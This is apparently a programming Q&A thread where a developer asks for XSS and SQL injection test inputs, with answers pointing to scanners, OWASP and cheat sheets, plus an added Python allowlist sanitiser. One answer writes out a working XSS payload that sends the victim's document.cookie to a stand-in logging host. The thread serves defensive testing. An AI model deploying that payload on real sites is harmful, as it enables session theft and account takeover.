ggfan

Reputation: 2492

Can someone give me some basic XSS and sql injection scripts? (not what it seems)

I am testing out my scripts to see if they will prevent XSS and SQL injections. Can someone provide me with some basic but good scripts that would "hack" into my programs? I want to test my scripts before they go online.

EDIT: Thank you all for those links; they contain loads and loads of information. But for a beginner to security, is there a recommended site that's? I'm not sure if I am ready to dive straight into in-depth security issues. I like the links waiwai933 recommended.

Upvotes: 10

Views: 3194

Answers (7)

Delan Azabani

Reputation: 81404

The simplest one, which doesn't get blocked by browsers and can happen easily if you don't strip_tags(), is the following code:

<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>

Upvotes: 1

Kemo

Reputation: 7042

You can try Acunetix Security Scanner; it won't scan only for XSS and MySQL injection by default but also for other sorts of exploits. The program practically emulates a browser and can behave as a logged-in user.

Upvotes: 0

Tgr

Reputation: 28190

The XSS cheatsheet at http://ha.ckers.org/xss.html is a good collection of XSS tests. I would not recommend implementing your own XSS checker, though; it is a lot harder than detecting SQL injections (as you will probably realize upon seeing some of the examples in the cheatsheet). The only solid method is to parse the code, build a DOM tree from it and transform that tree back to HTML, and that is a lot of work, and other people have done it already. Use something like HTML Purifier.

Upvotes: 2
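Following the approach Tgr's answer recommends (parse the markup, then re-serialise only what an allowlist permits) rather than a strip_tags-style filter, here is an added example that is not code from any answer above: a small Python sanitiser built on the standard library's html.parser. The allowlist, the http(s)-only href rule and the class name are assumptions chosen for illustration; a production library such as HTML Purifier does the same job far more thoroughly (it also repairs tag balancing, which this one does not).

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist: element name -> attributes kept on it (an assumption, not a standard).
ALLOWED = {"p": set(), "b": set(), "i": set(), "a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")   # only absolute http(s) link targets survive on <a href>


class AllowlistSanitizer(HTMLParser):
    """Parse untrusted HTML and re-serialise only the elements/attributes in ALLOWED."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside <script>/<style>, whose content is dropped entirely

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED:
            return            # unknown element: drop the tag itself, keep its (escaped) text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue      # e.g. style, id or an event-handler attribute: not on the allowlist
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue      # reject link targets that are not absolute http(s) URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED and not self.skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # text nodes are always re-escaped


def sanitize(untrusted_html: str) -> str:
    """Return an allowlisted re-serialisation of untrusted_html (tag balancing is not repaired)."""
    parser = AllowlistSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return "".join(parser.out)
```

Feeding it the cookie-logging snippet from Delan Azabani's answer yields an empty string, while ordinary markup such as a paragraph with a bold word and an https link passes through with its unlisted attributes removed.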

Gabriel

Reputation: 18780

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

I have used this tool with some great results.

Upvotes: 1

David

Reputation: 73564

+1 for caring and knowing enough to ask. Since you're asking security questions I'd like to recommend the OWASP web site if you're not already familiar. You'll find all sorts of information over and above what you've asked, not to mention tons of info on preventing all sorts of attacks. The site is an invaluable tool for web developers.

Upvotes: 1

waiwai933

Reputation: 14559

Each situation requires different scripts, so there is no 'one size fits all' that anyone could provide. The list of scripts that would need to be tested goes into the thousands before you can be certain that your site is safe.

You may want to check Firefox or Chrome plugins which allow you to test SQL injections. I suggest this one, but you may want to look for others as well: https://addons.mozilla.org/en-US/firefox/addon/6727. What this does is allow you to provide a list of injection scripts (it probably provides a few by default), and then once you activate it, it bombards your site with these scripts and lets you see where the vulnerabilities are.

I suggest this site for some example XSS scripts: http://ha.ckers.org/xss.html

Upvotes: 5

Alex Martelli

Reputation: 881873

Google's new Jarlsberg instructional site is a great resource to teach you how to write and defend against XSS and several other security attacks.

Upvotes: 1
